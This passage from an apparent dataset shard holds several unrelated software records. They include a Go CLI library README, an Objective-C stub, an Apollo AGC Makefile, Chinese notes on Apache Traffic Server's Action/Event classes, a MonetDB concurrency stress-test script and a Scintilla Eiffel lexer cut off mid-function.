Status](https://travis-ci.org/urfave/cli.svg?branch=master)](https://travis-ci.org/urfave/cli)\n[![Windows Build Status](https://ci.appveyor.com/api/projects/status/rtgk5xufi932pb2v?svg=true)](https://ci.appveyor.com/project/urfave/cli)\n\n[![GoDoc](https://godoc.org/github.com/urfave/cli?status.svg)](https://godoc.org/github.com/urfave/cli)\n[![codebeat](https://codebeat.co/badges/0a8f30aa-f975-404b-b878-5fab3ae1cc5f)](https://codebeat.co/projects/github-com-urfave-cli)\n[![Go Report Card](https://goreportcard.com/badge/urfave/cli)](https://goreportcard.com/report/urfave/cli)\n[![codecov](https://codecov.io/gh/urfave/cli/branch/master/graph/badge.svg)](https://codecov.io/gh/urfave/cli)\n\ncli is a simple, fast, and fun package for building command line apps in Go. The\ngoal is to enable developers to write fast and distributable command line\napplications in an expressive way.\n\n## Usage Documentation\n\nUsage documentation exists for each major version\n\n- `v1` - [./docs/v1/manual.md](./docs/v1/manual.md)\n- `v2` - 🚧 documentation for `v2` is WIP 🚧\n\n## Installation\n\nMake sure you have a working Go environment. Go version 1.10+ is supported. [See\nthe install instructions for Go](http://golang.org/doc/install.html).\n\n### GOPATH\n\nMake sure your `PATH` includes the `$GOPATH/bin` directory so your commands can\nbe easily used:\n```\nexport PATH=$PATH:$GOPATH/bin\n```\n\n### Supported platforms\n\ncli is tested against multiple versions of Go on Linux, and against the latest\nreleased version of Go on OS X and Windows. For full details, see\n[`./.travis.yml`](./.travis.yml) and [`./appveyor.yml`](./appveyor.yml).\n\n### Using `v1` releases\n\n```\n$ go get github.com/urfave/cli\n```\n\n```go\n...\nimport (\n \"github.com/urfave/cli\"\n)\n...\n```\n\n### Using `v2` releases\n\n**Warning**: `v2` is in a pre-release state.\n\n```\n$ go get github.com/urfave/cli.v2\n```\n\n```go\n...\nimport (\n \"github.com/urfave/cli.v2\" // imports as package \"cli\"\n)\n...\n```\n"} {"text": "\n\n

Analysis of Condor Downloads

\n

Analysis of Older Condor Releases

\n\n\t\n\t\t\n\t\n\t\n\t\t\n\t\n\t\n\t\t\n\t\n\t\n\t\t\n\t\n\t\n\t\t\n\t\n\t\n\t\n\t\n\t\n\t\t\n\t\n\t\n\t\t\n\t\n
\n\t\t
\n\t\t\"\"
\n\t\t
\n\t\t\"\"
\n\t\t
\n\t\t\"\"
\n\t\t
\n\t\t\"\"
\n\t\t
\n\t\t\"\"
\n\t\t
\n\t\t\"\"
\n\t\t
\n\t\t\"\"
\n\t\t
\n\t\t\"\"
\n\n\n"} {"text": "/*\n This file is part of Darling.\n\n Copyright (C) 2019 Lubos Dolezel\n\n Darling is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n Darling is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with Darling. If not, see .\n*/\n\n#import \n\n@implementation MKMultiPoint\n\n- (NSMethodSignature *)methodSignatureForSelector:(SEL)aSelector\n{\n return [NSMethodSignature signatureWithObjCTypes: \"v@:\"];\n}\n\n- (void)forwardInvocation:(NSInvocation *)anInvocation\n{\n NSLog(@\"Stub called: %@ in %@\", NSStringFromSelector([anInvocation selector]), [self class]);\n}\n\n@end\n"} {"text": "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"} {"text": "# Copyright:\tPublic domain.\n# Filename:\tMakefile\n# Purpose:\tMakefile for Colossus 1A, Build 249.\n#\t\t(The source code for the Command Module's (CM)\n#\t\tApollo Guidance Computer (AGC), maybe for Apollo 8 and/or 9.)\n# Contact:\tRon Burkey .\n# Mod history:\t11/13/03 RSB.\tAdapted from Luminary131 makefile.\n#\t\t11/25/03 RSB.\tRemoved the '-' prefices in the\n#\t\t\t\tColossus249.bin target.\n#\t\t01/01/04 RSB\tFixed the path for Oct2Bin\n#\t\t05/06/04 RSB\tInstalls Colossus249.bin.\n#\t\t05/14/04 RSB\tAdded PREFIX\n#\t\t09/05/04 RSB\tNow runs yaYUL by default.\n#\t\t07/28/05 RSB\tNow account for symtabs.\n#\t\t2009-07-04 RSB\tAdded --html switch.\n#\t\t2011-05-03 JL\tReplaced with newer version from Artemis072.\n#\t\t\t\tPoint to moved Oct2Bin.\n#\t\t2012-09-16 JL\tUpdated to match tools dir changes.\n#\t\t2016-10-04 JL\tChange to use Makefile.inc.\n\nBASENAME=Colossus249\ninclude ../Makefile.inc\n"} {"text": "# 核心部件:Action & Event\n\n在介绍 Event 之前,首先了解一下 Action:\n\n当一个 状态机 通过某个 Processor方法 发起一个请求时,如果该请求将通过异步操作完成时,Processor 将返回一个指向 Action 对象的指针。\n- 通过一个指向 Action 对象的指针,状态机 可以取消正在进行中的异步操作。\n- 在取消之后,发起该操作的 状态机 将不会接收到来自该异步操作的回调。\n- 对于 Event System 中的 Processor 还有整个IO核心库公开的方法/函数来说,Action或其派生类 是一种常见的返回类型。\n- 只有 Action 将要回调的那个 状态机,才可以取消该 Action,而且在这之前要持有 状态机 的锁。\n\n## 定义/成员\n\nEvent 继承自 Action,首先看一下 Action 类\n\n```\nclass Action\n{\npublic:\n Continuation * continuation;\n Ptr mutex;\n // 防止编译器缓存该变量的值, 在 64bits 平台, 对该值的 读取 或 设置 是原子的\n volatile int cancelled;\n\n // 可由继承类重写, 实现继承类中对应的处理\n // 作为 Action 对外部提供的唯一接口\n virtual void cancel(Continuation * c = NULL) {\n if (!cancelled)\n cancelled = true;\n }\n\n // 此方法总是直接对 Action 基类设置取消操作, 跳过继承类的取消流程\n // 在 ATS 代码内, 此方法为 Event 对象专用\n void cancel_action(Continuation * c = NULL) {\n if (!cancelled)\n cancelled = true;\n }\n\n // 重载赋值(=)操作\n // 用于初始化 Action\n // acont 为操作完成时回调的状态机\n // mutex 为上述状态机的锁, 采用 Ptr<> 自动指针管理\n Continuation *operator =(Continuation * acont)\n {\n continuation = acont;\n if (acont)\n mutex = acont->mutex;\n else\n mutex = 0;\n return acont;\n }\n\n // 构造函数\n // 初始化continuation为NULL,cancelled为false\n Action():continuation(NULL), cancelled(false) {\n }\n\n virtual ~ Action() {\n }\n};\n```\n\n## Processor 方法实现者:\n\n在实现一个 Processor 的方法时, 必须确保:\n\n- 在操作被取消之后,不会有事件发送给状态机。\n\n## 返回一个 Action:\n\nProcessor 方法通常是异步执行的,因此必须返回Action,这样状态机才能在任务完成前随时取消该任务。\n\n- 一个“**任务状态机**”将会被创建出来,用于完成该异步任务,\n- 在该“**任务状态机**”内包含一个 Action 对象的实例,Processor 返回的是指向该 Action 实例的指针,\n- 此时, 发起调用的状态机总是先获得 Action指针,\n- 然后才会收到该异步任务以回调的方式,传递的结果,\n- 在收到回调之前, 随时可以通过 Action指针 取消该任务。\n\n由于某些 Processor 的方法是可以同步执行的(可重入的),因此可能会出现:\n\n- 首先通过回调的方式,向发起调用的状态机传递了结果,\n- 然后,再向将 Action 返回给发起调用的状态机。\n\n此时返回 Action 是毫无意义的, 为了处理这种情况,返回特殊的几个值来代替 Action 对象,以指示状态机该动作已经完成。\n\n- ACTION\\_RESULT\\_DONE\n - 该 Processor 已经完成了任务,并内嵌(同步)回调了状态机\n- ACTION\\_RESULT\\_INLINE\n - 当前未使用\n- ACTION\\_RESULT\\_IO\\_ERROR\n - 当前未使用\n\n也许会出现这样一种更复杂的问题:\n\n- 当结果为 ACTION\\_RESULT\\_DONE\n- 同时,状态机在同步回调中释放了自身\n \n因此,状态机的实现者必须:\n\n- 同步回调时, 不要释放自身(不容易判断出回调的类型是同步还是异步)\n\n或者,\n\n- 立即检查 Processor 方法返回的 Action\n- 如果该值为 ACTION\\_RESULT\\_DONE,那么就不能对状态机的任何状态变量进行读或写。\n\n无论使用哪种方式,都要对返回值进行检查(是否为 ACTION\\_RESULT\\_DONE),同时进行相应的处理。\n\n\n## 回调状态机\n\nAction 的成员\n\n- continuation 指向了将要回调的状态机\n- mutex 指向了该状态机的锁\n- cancelled 表明该 Action 是否已经被取消\n\n为了在状态机释放自身后,仍然可以合法访问 mutex 对象,将 mutex 声明为 Ptr\\ 类型,以避免 mutex 随状态机的销毁而同时被释放。\n\n回调状态机的步骤如下:\n\n1. 首先要尝试对 Action::mutex 上锁,只有上锁成功,才可以访问 Action 的成员变量\n - 前面介绍过,只有 Action 将要回调的那个状态机才可以取消 Action,也就是将 Action::cancelled 设置为 true\n - 这是因为 mutex 指向了状态机的锁,共享同一把锁的状态机是互斥的,因此可以安全访问 Action::cancelled\n - 因此,凡是共享同一把锁的状态机都是可以取消该 Action 的\n - 如果上锁失败,就要通过 Event System 重新尝试上锁\n2. 上锁成功后,需要判断 Action::cancelled 为 false\n - 当 cancelled 为 true 时,表示状态机已经取消了该 Action\n - 此时,状态机可能已经销毁,因此 continuation 已经不再指向一个合法的状态机\n - 该“**任务状态机**”应该停止继续执行,接下来应该销毁自身并回收资源\n3. 最后通过 continuation 回调状态机,使用约定的 event 将 data 传递给状态机\n - 应当确保在任何回调发生时,目标状态机被当前线程上锁\n\n\n## 分配/释放策略:\n\nAction 的分配和释放遵循以下策略:\n\n- Action 由执行它的 Processor 进行分配。\n - 通常 Processor 方法会创建一个“**任务状态机**”来异步执行某个特定任务\n - 而 Action 对象则是该“**任务状态机**”的一个成员对象\n- 当 Action 完成或者被取消后,Processor 有责任和义务来释放它。\n - 当“**任务状态机**”需要回调 状态机 时,\n - 通过 Action 获得 mutex 并对其上锁\n - 然后检查 Action 的成员 cancelled\n - 如已经 cancelled, 则销毁“**任务状态机**”\n - 否则回调 Action.continuation,以传递结果\n- 当返回的 Action 已经完成,或者状态机对一个 Action 执行了取消操作,\n - 状态机就不可以再访问该 Action。\n\n\n## 参考资料\n\n[I_Action.h](http://github.com/apache/trafficserver/tree/master/iocore/eventsystem/I_Action.h)\n\n\n# 核心部件:Event\n\nEvent类 继承自 Action类, 它是 EventProcessor 返回的专用 Action 类型,它作为调度操作的结果由 EventProcessor 返回。\n\n不同于 Action 的异步操作,Event 是不可重入的。\n\n - EventProcessor 总是返回 Event 对象给状态机,\n - 然后, 状态机才会收到回调。\n - 不会像 Action类 的返回者, 可能存在同步回调 状态机 的情形。\n\n除了能够取消事件(因为它是一个动作),你也可以在收到它的回调之后重新对它进行调度。\n\n## 定义/成员\n\n```\nclass Event : public Action \n{ \npublic: \n // 设置事件(Event)类型的方法\n void schedule_imm(int callback_event = EVENT_IMMEDIATE); \n void schedule_at(ink_hrtime atimeout_at, int callback_event = EVENT_INTERVAL); \n void schedule_in(ink_hrtime atimeout_in, int callback_event = EVENT_INTERVAL); \n void schedule_every(ink_hrtime aperiod, int callback_event = EVENT_INTERVAL);\n\n // Inherited from Action:\n // Continuation * continuation;\n // Ptr mutex;\n // volatile int cancelled;\n // virtual void cancel(Continuation * c = NULL); \n\n // 处理此Event的ethread指针,在ethread处理此Event之前填充(就是在schedule时)。\n // 当一个 Event 由一个 EThread 管理后, 就无法在转交给其它 EThread 管理。\n EThread *ethread;\n\n // 状态及标志位\n unsigned int in_the_prot_queue:1; \n unsigned int in_the_priority_queue:1; \n unsigned int immediate:1; \n unsigned int globally_allocated:1; \n unsigned int in_heap:4; \n\n // 向Cont->handler传递的事件(Event)类型\n int callback_event;\n\n // 组合构成四种事件(Event)类型\n ink_hrtime timeout_at; \n ink_hrtime period;\n\n // 在回调Cont->handler时作为数据(Data)传递\n void *cookie;\n\n // 构造函数\n Event();\n\n // 初始化一个Event\n Event *init(Continuation * c, ink_hrtime atimeout_at = 0, ink_hrtime aperiod = 0);\n // 释放Event\n void free();\n\nprivate:\n // use the fast allocators\n void *operator new(size_t size);\n\n // prevent unauthorized copies (Not implemented)\n Event(const Event &); \n Event & operator =(const Event &);\npublic: \n LINK(Event, link);\n\n virtual ~Event() {}\n};\n\nTS_INLINE Event *\nEvent::init(Continuation *c, ink_hrtime atimeout_at, ink_hrtime aperiod)\n{\n continuation = c;\n timeout_at = atimeout_at;\n period = aperiod;\n immediate = !period && !atimeout_at;\n cancelled = false;\n return this;\n}\n\nTS_INLINE void\nEvent::free()\n{\n mutex = NULL;\n eventAllocator.free(this);\n}\n\nTS_INLINE\nEvent::Event()\n : ethread(0), in_the_prot_queue(false), in_the_priority_queue(false), \n immediate(false), globally_allocated(true), in_heap(false),\n timeout_at(0), period(0)\n{\n}\n\n// Event 的内存分配不对空间进行 bzero() 操作, 因此在 Event::init() 方法中会初始化所有必要的值\n#define EVENT_ALLOC(_a, _t) THREAD_ALLOC(_a, _t)\n#define EVENT_FREE(_p, _a, _t) \\\n _p->mutex = NULL; \\\n if (_p->globally_allocated) \\\n ::_a.free(_p); \\\n else \\\n THREAD_FREE(_p, _a, _t)\n```\n\n## Event 方法\n\nEvent::init()\n\n- 初始化一个 Event\n- 通常用来准备一个 Event,然后选择一个新的 EThread 线程来处理这个事件时使用\n- 接下来通常会调用 EThread::schedule() 方法\n\nEvent::schedule\\_\\*()\n\n- 如果事件(Event)已经存在于 EThread 的```内部队列```,则先从队列中删除\n- 然后直接向 EThread 的```本地队列```添加事件(Event)\n- 因此此方法只能向当前 EThread 事件池添加事件(Event),不能跨线程添加\n\n对于 Event::schedule\\_\\*() 的使用,在源代码中有相关注释,翻译如下:\n\n- 当通过任何 Event类 的调度函数重新调度一个事件时,状态机(SM)不可以在除了回调它的线程以外的线程中调用这些调度函数(好绕,其实就是状态机必须在回调它的线程里调用重新调度的函数),而且必须在调用之前获得该 延续(Continuation) 的锁。\n- Event 是与线程绑定的,一个 Event 诞生后,只可以在一个线程内重新调度\n- 如果希望把 延续(Continuation) 重新调度到另外一个线程,可以通过 EThread::schedule\\_\\*() 方法,或者 EventProcessor::schedule\\_\\*() 方法 实现\n\n## 事件(Event)的类型\n\nATS 中的事件(Event),被设计为以下四种类型:\n\n- 立即执行\n - timeout\\_at=0,period=0\n - 通过 schedule\\_imm 设置 callback\\_event=EVENT\\_IMMEDIATE\n - 或通过 schedule\\_imm\\_signal\n- 绝对定时执行\n - timeout\\_at>0,period=0\n - 通过 schedule\\_at 设置 callback\\_event=EVENT\\_INTERVAL,可以理解为在xx时刻执行\n- 相对定时执行\n - timeout\\_at>0,period=0\n - 通过 schedule\\_in 设置 callback\\_event=EVENT\\_INTERVAL,可以理解为在xx时间之内执行\n- 定期/周期执行\n - timeout\\_at=period>0\n - 通过 schedule\\_every 设置 callback_event=EVENT\\_INTERVAL,可以理解为每隔一定时间重复执行\n\n另外针对隐性队列,还有特殊的第五种类型:\n\n- 随时执行\n - timeout_at=period<0\n - 通过 schedule\\_every 设置 callback\\_event=EVENT\\_INTERVAL\n - 调用 Cont->handler 时会固定传送 EVENT_POLL 事件类型\n - 对于 TCP连接,此种类型的事件(Event)由 NetHandler::startNetEvent 添加\n - Cont->handler 对于TCP事件为 NetHandler::mainNetEvent()\n\n### Time values:\n\n任务调度函数使用了一个类型为 ink\\_hrtime 用来指定超时或周期的时间参数。这是由 libts 支持的纳秒值,你应该使用在 ink\\_hrtime.h 中定义的时间函数和宏。\n\n超时参数对于 schedule\\_at和schedule\\_in 之间的差别在于:\n\n- 在前者,它是绝对时间,未来的某个预定的时刻\n- 在后者,它是相对于当前时间(通过ink\\_get\\_hrtime得到)的一个量\n\n\n### 取消Event的规则\n\n与下面这些对于Action的规则是一样的\n\n- Event 的取消者必须是该任务将要回调的状态机,同时在取消的过程中需要持有状态机的锁\n- 任何在该状态机持有的对于该Event对象(例如:指针)的引用,在取消操作之后都不得继续使用\n\n\n### Event Codes:\n\n- 在事件完成后,状态机SM使用延续处理函数(Cont->handleEvent)传递进来的 Event Codes 来区分 Event类型 和处理相应的数据参数。\n- 定义 Event Code 时,状态机的实现者应该小心处理,因为它们对其它状态机产生影响。\n- 由于这个原因,Event Code 通常统一进行分配。\n\n通常在调用 Cont->handleEvent 时传递的 Event Code 有如下几种:\n\n```\n#define EVENT_NONE CONTINUATION_EVENT_NONE // 0\n#define EVENT_IMMEDIATE 1\n#define EVENT_INTERVAL 2\n#define EVENT_ERROR 3\n#define EVENT_CALL 4 // used internally in state machines\n#define EVENT_POLL 5 // negative event; activated on poll or epoll\n```\n\n通常 Cont->handleEvent 也会返回一个 Event Callback Code\n\n```\n#define EVENT_DONE CONTINUATION_DONE // 0\n#define EVENT_CONT CONTINUATION_CONT // 1\n#define EVENT_RETURN 5\n#define EVENT_RESTART 6\n#define EVENT_RESTART_DELAYED 7\n```\n\nPS:但是在 EThread::execute() 中没有对 Cont->handleEvent 的返回值进行判断。\n\nEVENT\\_DONE 通常表示该 Event 已经成功完成了回调操作, 该Event接下来应该被释放。(参照: ACTION\\_RESULT\\_DONE)\n\nEVENT\\_CONT 通常表示该 Event 没有完成回调操作, 还需要保留以进行下一次回调的尝试。\n\n## 使用\n\n### 创建一个Event实例,有两种方式\n\n- 全局分配\n - Event *e = ::eventAllocator.alloc();\n - 默认情况都是通过全局方式分配的,因为分配内存时还不确认要交给哪一个线程来处理。\n - 构造函数初始化 globally_allocated(true)\n - 这样就需要全局锁\n- 本地分配\n - Event *e = EVENT_ALLOC(eventAllocator, this);\n - 如果预先知道这个 Event 一定会交给当前线程来处理,那么就可以采用本地分配的方法\n - 调用 EThread::schedule\\_*\\_local() 方法时,会设置 globally\\_allocated = false\n - 不会影响全局锁,效率更高\n\n### 放入EventSystem\n\n- 根据轮询规则选择下一个线程,然后将Event放入选择的线程\n - eventProcessor.schedule(e->init(cont, timeout, period));\n - EThread::schedule(e->init(cont, timeout, period));\n- 放入当前线程\n - e->schedule\\_\\*();\n - this\\_ethread()->schedule\\_\\*\\_local(e);\n - 只能在 e->ethread == this\\_ethread() 的时候使用\n\n### 释放Event\n\n- 全局分配\n - eventAllocator.free(e);\n - ::eventAllocator.free(e);\n - 在ATS的代码里能看到上面两种写法,我理解两种是一个意思,因为只有一个全局的 eventAllocator\n- 自动判断\n - EVENT\\_FREE(e, eventAllocator, t);\n - 根据 e->globally\\_allocated 来判断\n\n### 重新调度Event\n\n状态机在收到来自 EThread 的回调后, void \\*data 指向触发此次回调的 Event 对象。\n\n- 将 data 简单的进行类型转换后, 可以调用 Event::schedule\\_\\*() 将此 Event 重新放入当前线程,\n- 在重新调度后, Event 的类型将会被 schedule\\_\\*() 方法重新设置。\n\n\n## 参考资料\n\n- [I_Event.h](http://github.com/apache/trafficserver/tree/master/iocore/eventsystem/I_Event.h)\n- [P_UnixEvent.h](http://github.com/apache/trafficserver/tree/master/iocore/eventsystem/P_UnixEvent.h)\n- [UnixEvent.cc](http://github.com/apache/trafficserver/tree/master/iocore/eventsystem/UnixEvent.cc)\n\n"} {"text": "#!/usr/bin/env bash\n\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n# Copyright 1997 - July 2008 CWI, August 2008 - 2020 MonetDB B.V.\n\n# Run mclient with a variable number of concurrent connections for\n# simple SELECT 1; queries. Disconnect after each query. Continue as\n# long as the server can cope.\n# This script intends to simulate a scenario as reported in bug #2700\n\ndo_usage() {\n\techo \"usage: concurrent_stress.sh [database [host [port]]]\" \n\texit 1\n}\n\n[[ -z $1 ]] && do_usage\n\nCONCURRENCY=$1\nshift\nfor v in MDATABASE:d MHOST:h MPORT:p ; do\n\t[[ -z $1 ]] && break\n\teval ${v%:*}=\"-${v#*:}$1\"\n\tshift\ndone\n\nif ! type -P mclient > /dev/null ; then\n\techo \"cannot find mclient in PATH!\" > /dev/stderr\n\texit 1\nfi\n\necho \"invoking $CONCURRENCY runners using the command:\"\necho \" mclient $MDATABASE $MHOST $MPORT -ftab -s \\\"SELECT 1;\\\"\"\n\nconcurrent_runner() {\n\tlocal num=$1\n\tlocal cnt=1\n\tlocal now=$SECONDS\n\tlocal lcnt=0\n\tlocal elapse=\n\tlocal t=\n\twhile mclient $MDATABASE $MHOST $MPORT -ftab -s \"SELECT 1;\" > /dev/null ; do\n\t\t: $((cnt++))\n\t\telapse=$((SECONDS - now))\n\t\tif [[ ${elapse} -ge 3 ]] ; then\n\t\t\tt=$((cnt - lcnt))\n\t\t\tt=$((t * 100))\n\t\t\tt=$((t / elapse))\n\t\t\techo \"mclient $num executed query $cnt, current speed: ${t%??}.${t#${t%??}}q/s\"\n\t\t\tlcnt=${cnt}\n\t\t\tnow=$SECONDS\n\t\tfi\n\tdone\n\techo \"mclient $num terminated in query $cnt\"\n}\n\nFORKS=\nfor nr in $(seq 1 $CONCURRENCY) ; do\n\tconcurrent_runner $nr &\n\tFORKS+=\" $!\"\ndone\n\ncleanup() {\n\tkill $FORKS\n}\ntrap cleanup TERM INT QUIT\n\n# wait for all children to end\nwait $FORKS\n"} {"text": "// Scintilla source code edit control\r\n/** @file LexEiffel.cxx\r\n ** Lexer for Eiffel.\r\n **/\r\n// Copyright 1998-2001 by Neil Hodgson \r\n// The License.txt file describes the conditions under which this software may be distributed.\r\n\r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n\r\n#include \"ILexer.h\"\r\n#include \"Scintilla.h\"\r\n#include \"SciLexer.h\"\r\n\r\n#include \"WordList.h\"\r\n#include \"LexAccessor.h\"\r\n#include \"Accessor.h\"\r\n#include \"StyleContext.h\"\r\n#include \"CharacterSet.h\"\r\n#include \"LexerModule.h\"\r\n\r\nusing namespace Scintilla;\r\n\r\nstatic inline bool isEiffelOperator(unsigned int ch) {\r\n\t// '.' left out as it is used to make up numbers\r\n\treturn ch == '*' || ch == '/' || ch == '\\\\' || ch == '-' || ch == '+' ||\r\n\t ch == '(' || ch == ')' || ch == '=' ||\r\n\t ch == '{' || ch == '}' || ch == '~' ||\r\n\t ch == '[' || ch == ']' || ch == ';' ||\r\n\t ch == '<' || ch == '>' || ch == ',' ||\r\n\t ch == '.' || ch == '^' || ch == '%' || ch == ':' ||\r\n\t\tch == '!' || ch == '@' || ch == '?';\r\n}\r\n\r\nstatic inline bool IsAWordChar(unsigned int ch) {\r\n\treturn (ch < 0x80) && (isalnum(ch) || ch == '_');\r\n}\r\n\r\nstatic inline bool IsAWordStart(unsigned int ch) {\r\n\treturn (ch < 0x80) && (isalnum(ch) || ch == '_');\r\n}\r\n\r\nstatic void ColouriseEiffelDoc(Sci_PositionU startPos,\r\n Sci_Position length,\r\n int initStyle,\r\n WordList *keywordlists[],\r\n Accessor &styler) {\r\n\r\n\tWordList &keywords = *keywordlists[0];\r\n\r\n\tStyleContext sc(startPos, length, initStyle, styler);\r\n\r\n\tfor (; sc.More(); sc.Forward()) {\r\n\r\n\t\tif (sc.state == SCE_EIFFEL_STRINGEOL) {\r\n\t\t\tif (sc.ch != '\\r' && sc.ch != '\\n') {\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_DEFAULT);\r\n\t\t\t}\r\n\t\t} else if (sc.state == SCE_EIFFEL_OPERATOR) {\r\n\t\t\tsc.SetState(SCE_EIFFEL_DEFAULT);\r\n\t\t} else if (sc.state == SCE_EIFFEL_WORD) {\r\n\t\t\tif (!IsAWordChar(sc.ch)) {\r\n\t\t\t\tchar s[100];\r\n\t\t\t\tsc.GetCurrentLowered(s, sizeof(s));\r\n\t\t\t\tif (!keywords.InList(s)) {\r\n\t\t\t\t\tsc.ChangeState(SCE_EIFFEL_IDENTIFIER);\r\n\t\t\t\t}\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_DEFAULT);\r\n\t\t\t}\r\n\t\t} else if (sc.state == SCE_EIFFEL_NUMBER) {\r\n\t\t\tif (!IsAWordChar(sc.ch)) {\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_DEFAULT);\r\n\t\t\t}\r\n\t\t} else if (sc.state == SCE_EIFFEL_COMMENTLINE) {\r\n\t\t\tif (sc.ch == '\\r' || sc.ch == '\\n') {\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_DEFAULT);\r\n\t\t\t}\r\n\t\t} else if (sc.state == SCE_EIFFEL_STRING) {\r\n\t\t\tif (sc.ch == '%') {\r\n\t\t\t\tsc.Forward();\r\n\t\t\t} else if (sc.ch == '\\\"') {\r\n\t\t\t\tsc.Forward();\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_DEFAULT);\r\n\t\t\t}\r\n\t\t} else if (sc.state == SCE_EIFFEL_CHARACTER) {\r\n\t\t\tif (sc.ch == '\\r' || sc.ch == '\\n') {\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_STRINGEOL);\r\n\t\t\t} else if (sc.ch == '%') {\r\n\t\t\t\tsc.Forward();\r\n\t\t\t} else if (sc.ch == '\\'') {\r\n\t\t\t\tsc.Forward();\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_DEFAULT);\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tif (sc.state == SCE_EIFFEL_DEFAULT) {\r\n\t\t\tif (sc.ch == '-' && sc.chNext == '-') {\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_COMMENTLINE);\r\n\t\t\t} else if (sc.ch == '\\\"') {\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_STRING);\r\n\t\t\t} else if (sc.ch == '\\'') {\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_CHARACTER);\r\n\t\t\t} else if (IsADigit(sc.ch) || (sc.ch == '.')) {\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_NUMBER);\r\n\t\t\t} else if (IsAWordStart(sc.ch)) {\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_WORD);\r\n\t\t\t} else if (isEiffelOperator(sc.ch)) {\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_OPERATOR);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tsc.Complete();\r\n}\r\n\r\nstatic bool IsEiffelComment(Accessor &styler, Sci_Position pos, Sci_Position len) {\r\n\treturn len>1 && styler[pos]=='-' && styler[pos+1]=='-';\r\n}\r\n\r\nstatic void FoldEiffelDocIndent(Sci_PositionU startPos, Sci_Position length, int,\r\n\t\t\t\t\t\t WordList *[], Accessor &styler) {\r\n\tSci_Position lengthDoc = startPos + length;\r\n\r\n\t// Backtrack to previous line in case need to fix its fold status\r\n\tSci_Position lineCurrent = styler.GetLine(startPos);\r\n\tif (startPos > 0) {\r\n\t\tif (lineCurrent > 0) {\r\n\t\t\tlineCurrent--;\r\n\t\t\tstartPos = styler.LineStart(lineCurrent);\r\n\t\t}\r\n\t}\r\n\tint spaceFlags = 0;\r\n\tint indentCurrent = styler.IndentAmount(lineCurrent, &spaceFlags, IsEiffelComment);\r\n\tchar chNext = styler[startPos];\r\n\tfor (Sci_Position i = startPos; i < lengthDoc; i++) {\r\n\t\tchar ch = chNext;\r\n\t\tchNext = styler.SafeGetCharAt(i + 1);\r\n\r\n\t\tif ((ch == '\\r' && chNext != '\\n') || (ch == '\\n') || (i == lengthDoc)) {\r\n\t\t\tint lev = indentCurrent;\r\n\t\t\tint indentNext = styler.IndentAmount(lineCurrent + 1, &spaceFlags, IsEiffelComment);\r\n\t\t\tif (!(indentCurrent & SC_FOLDLEVELWHITEFLAG)) {\r\n\t\t\t\t// Only non whitespace lines can be headers\r\n\t\t\t\tif ((indentCurrent & SC_FOLDLEVELNUMBERMASK) < (indentNext & SC_FOLDLEVELNUMBERMASK)) {\r\n\t\t\t\t\tlev |= SC_FOLDLEVELHEADERFLAG;\r\n\t\t\t\t} else if (indentNext & SC_FOLDLEVELWHITEFLAG) {\r\n\t\t\t\t\t// Line after is blank so check the next - maybe should continue further?\r\n\t\t\t\t\tint spaceFlags2 = 0;\r\n\t\t\t\t\tint indentNext2 = styler.IndentAmount(lineCurrent + 2, &spaceFlags2, IsEiffelComment);\r\n\t\t\t\t\tif ((indentCurrent & SC_FOLDLEVELNUMBERMASK) < (indentNext2 & SC_FOLDLEVELNUMBERMASK)) {\r\n\t\t\t\t\t\tlev |= SC_FOLDLEVELHEADERFLAG;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tindentCurrent = indentNext;\r\n\t\t\tstyler.SetLevel(lineCurrent, lev);\r\n\t\t\tlineCurrent++;\r\n\t\t}\r\n\t}\r\n}\r\n\r\nstatic void FoldEiffelDocKeyWords(Sci_PositionU startPos, Sci_Position length, int /* initStyle */, WordList *[],\r\n Accessor &styler) {\r\n\tSci_PositionU lengthDoc = startPos + length;\r\n\tint visibleChars = 0;\r\n\tSci_Position lineCurrent = styler.GetLine(startPos);\r\n\tint levelPrev = styler.LevelAt(lineCurrent) & SC_FOLDLEVELNUMBERMASK;\r\n\tint levelCurrent = levelPrev;\r\n\tchar chNext = styler[startPos];\r\n\tint stylePrev = 0;\r\n\tint styleNext = styler.StyleAt(startPos);\r\n\t// lastDeferred should be determined by looking back to last keyword in case\r\n\t// the \"deferred\" is on a line before \"class\"\r\n\tbool lastDeferred = false;\r\n\tfor (Sci_PositionU i = startPos; i < lengthDoc; i++) {\r\n\t\tchar ch = chNext;\r\n\t\tchNext = styler.SafeGetCharAt(i + 1);\r\n\t\tint style = styleNext;\r\n\t\tstyleNext = styler.StyleAt(i + 1);\r\n\t\tbool atEOL = (ch == '\\r' && chNext != '\\n') || (ch == '\\n');\r\n\t\tif ((stylePrev != SCE_EIFFEL_WORD) && (style == SCE_EIFFEL_WORD)) {\r\n\t\t\tchar s[20];\r\n\t\t\tSci_PositionU j = 0;\r\n\t\t\twhile ((j < (sizeof(s) - 1)) && (iswordchar(styler[i + j]))) {\r\n\t\t\t\ts[j] = 